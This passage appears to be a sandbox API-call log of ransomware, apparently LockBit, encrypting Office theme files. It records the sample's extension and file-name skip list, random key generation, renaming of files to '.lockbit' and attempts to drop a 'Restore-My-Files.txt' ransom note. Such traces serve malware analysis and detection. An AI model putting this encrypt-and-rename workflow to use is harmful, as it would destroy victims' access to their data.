[0193.492] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0193.492] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0193.492] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0193.493] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0193.493] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0193.493] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0193.493] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0193.493] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0193.493] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0193.493] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0193.493] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0193.493] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0193.493] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0193.493] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0193.493] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0193.493] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0193.493] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0193.493] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0193.493] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0193.493] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0193.493] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0193.493] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0193.493] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0193.493] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Grid.xml.lockbit") returned 83 [0193.493] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Grid.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\grid.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0193.494] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0193.494] malloc (_Size=0x40068) returned 0x3d70450 [0193.494] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=959) returned 1 [0193.494] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.495] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.495] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0193.495] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.495] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.495] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0193.495] ReadFile (in: hFile=0x330, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0193.499] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Grid.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Grid.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.499] malloc (_Size=0xbc) returned 0x1fa2ed8 [0193.499] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xbc, FileInformationClass=0xa) returned 0x0 [0193.500] free (_Block=0x1fa2ed8) [0193.500] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Grid.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0193.500] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0193.500] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0193.500] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d67200, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x603ce830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d67200, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0x3c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hardcover.xml", cAlternateFileName="HARDCO~1.XML")) returned 1 [0193.500] lstrcmpiW (lpString1=".", lpString2="Hardcover.xml") returned -1 [0193.500] lstrcmpiW (lpString1="..", lpString2="Hardcover.xml") returned -1 [0193.500] PathFindExtensionW (pszPath="Hardcover.xml") returned=".xml" [0193.500] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0193.500] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0193.500] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0193.500] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0193.500] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0193.500] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0193.501] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0193.501] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0193.501] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0193.501] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0193.501] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0193.501] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0193.501] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0193.501] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0193.501] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0193.501] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0193.501] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0193.501] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0193.501] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0193.501] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0193.501] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0193.501] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0193.501] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0193.501] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0193.501] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.501] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0193.501] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0193.501] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0193.501] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0193.501] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0193.501] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0193.501] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0193.502] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0193.502] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0193.502] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0193.502] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0193.502] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0193.502] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0193.502] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0193.502] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0193.502] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0193.502] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0193.502] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.502] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0193.502] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0193.502] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0193.502] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0193.502] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Hardcover.xml") returned 1 [0193.502] lstrcmpiW (lpString1="ntldr", lpString2="Hardcover.xml") returned 1 [0193.502] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Hardcover.xml") returned 1 [0193.502] lstrcmpiW (lpString1="bootsect.bak", lpString2="Hardcover.xml") returned -1 [0193.502] lstrcmpiW (lpString1="autorun.inf", lpString2="Hardcover.xml") returned -1 [0193.502] lstrcmpiW (lpString1="thumbs.db", lpString2="Hardcover.xml") returned 1 [0193.502] lstrcmpiW (lpString1="iconcache.db", lpString2="Hardcover.xml") returned 1 [0193.502] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0193.502] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Hardcover.xml") returned=".xml" [0193.502] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0193.502] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0193.503] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0193.503] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0193.503] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0193.503] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0193.503] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0193.503] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0193.503] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0193.503] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0193.503] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0193.503] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0193.503] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0193.503] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0193.503] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0193.503] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0193.503] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0193.503] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0193.503] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0193.503] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0193.503] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0193.503] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0193.503] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0193.503] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0193.503] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0193.503] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0193.503] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0193.504] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0193.504] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Hardcover.xml.lockbit") returned 88 [0193.504] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Hardcover.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\hardcover.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0193.505] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0193.505] malloc (_Size=0x40068) returned 0x3f70048 [0193.505] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=964) returned 1 [0193.505] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.505] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.505] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0193.505] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.506] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.506] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0193.506] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0193.510] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Hardcover.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Hardcover.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.511] malloc (_Size=0xc6) returned 0x1fa2ed8 [0193.511] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc6, FileInformationClass=0xa) returned 0x0 [0193.511] free (_Block=0x1fa2ed8) [0193.511] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Hardcover.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0193.511] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0193.511] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0193.511] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1786e800, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x51c9cf70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1786e800, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0x39e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Horizon.xml", cAlternateFileName="")) returned 1 [0193.512] lstrcmpiW (lpString1=".", lpString2="Horizon.xml") returned -1 [0193.512] lstrcmpiW (lpString1="..", lpString2="Horizon.xml") returned -1 [0193.512] PathFindExtensionW (pszPath="Horizon.xml") returned=".xml" [0193.512] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0193.512] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0193.512] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0193.512] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0193.512] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0193.512] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0193.512] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0193.512] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0193.512] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0193.512] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0193.512] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0193.512] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0193.512] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0193.512] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0193.512] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0193.512] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0193.512] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0193.512] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0193.512] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0193.512] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0193.512] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0193.512] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0193.512] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0193.513] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0193.513] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.513] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0193.513] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0193.513] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0193.513] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0193.513] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0193.513] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0193.513] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0193.513] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0193.513] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0193.513] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0193.513] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0193.513] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0193.513] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0193.513] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0193.513] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0193.513] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0193.513] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0193.513] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.513] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0193.513] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0193.513] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0193.513] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0193.513] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Horizon.xml") returned 1 [0193.514] lstrcmpiW (lpString1="ntldr", lpString2="Horizon.xml") returned 1 [0193.514] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Horizon.xml") returned 1 [0193.514] lstrcmpiW (lpString1="bootsect.bak", lpString2="Horizon.xml") returned -1 [0193.514] lstrcmpiW (lpString1="autorun.inf", lpString2="Horizon.xml") returned -1 [0193.514] lstrcmpiW (lpString1="thumbs.db", lpString2="Horizon.xml") returned 1 [0193.514] lstrcmpiW (lpString1="iconcache.db", lpString2="Horizon.xml") returned 1 [0193.514] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0193.514] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Horizon.xml") returned=".xml" [0193.514] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0193.514] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0193.514] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0193.514] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0193.514] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0193.514] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0193.514] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0193.514] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0193.514] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0193.514] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0193.514] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0193.514] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0193.514] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0193.514] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0193.514] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0193.514] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0193.514] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0193.515] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0193.515] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0193.515] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0193.515] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0193.515] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0193.515] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0193.515] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0193.515] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0193.515] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0193.515] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0193.515] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0193.515] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Horizon.xml.lockbit") returned 86 [0193.515] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Horizon.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\horizon.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0193.516] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0193.516] malloc (_Size=0x40068) returned 0x3e70008 [0193.516] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=926) returned 1 [0193.516] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.517] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0193.517] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.517] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0193.517] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0193.521] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Horizon.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Horizon.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.521] malloc (_Size=0xc2) returned 0x1fa2ed8 [0193.521] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc2, FileInformationClass=0xa) returned 0x0 [0193.522] free (_Block=0x1fa2ed8) [0193.522] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Horizon.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0193.522] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0193.522] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0193.523] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3c3a200, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x603ce830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf3c3a200, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0x3c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Median.xml", cAlternateFileName="")) returned 1 [0193.523] lstrcmpiW (lpString1=".", lpString2="Median.xml") returned -1 [0193.523] lstrcmpiW (lpString1="..", lpString2="Median.xml") returned -1 [0193.523] PathFindExtensionW (pszPath="Median.xml") returned=".xml" [0193.523] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0193.523] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0193.523] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0193.523] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0193.523] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0193.523] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0193.523] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0193.523] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0193.523] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0193.523] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0193.523] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0193.523] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0193.523] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0193.523] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0193.523] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0193.523] 